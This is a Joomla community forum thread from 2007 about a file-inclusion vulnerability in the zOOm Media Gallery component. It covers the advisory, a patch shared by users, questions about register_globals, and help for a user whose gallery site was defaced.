Joomla! Forum - community, help and support

A vulnerability has been identified in zOOm Media Gallery , which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Source  http://www.frsirt.com/english/advisories/2007/1353

I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P

Sorry Mike,not my strongpoint.

Maybe put a post asking for developers in another part of the forum

mikedeboer wrote: I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P

Hi Mike where I can sign-up.

Thanks Brian, I will.

ZZzzzz wrote: Hi Mike where I can sign-up.

If it's possible, could you send a short resumee (or something listing your experience) to 'mike AT zoomfactory DOT org'...or simply PM me

To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/

a new release will be available soon on the zoom factory website

http://www.zoomfactory.org

brian wrote: which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?

It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...

Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.

Regards,

A.Fraile

EDIT MOD: image doing publicity for hacker removed. No need to help the hackers. 

ZZzzzz wrote: To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/ a new release will be available soon on the zoom factory website
http://www.zoomfactory.org

Bit confused but if I understand right from Zoom forum messages.

1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the lastest Zoom download on the Zoom website why is the patch not available from the official Zoom website?

Hi!!

need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?

cadenza wrote: Hi!! need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?

Can we have some more information which version are you using, did you apply the security patch posted by Mike, your security settings globals etc…

I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread?

any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...

Thanks in advanced!

cadenza wrote: I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread? any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...

There is a vulnerability [1] in all version prior to 2.5.1 RC4. I would start by removing your current version since it is hard to tell which files have been compromised and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to login, the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains file.

[1] http://help.joomla.org/component/option ... temid,268/
[2] http://www.zoomfactory.org/index.php?op ... elect&id=1

Thanks! but is there a way to do it so that my existing galleries will remain? ie. upgrade instead of a re-installation?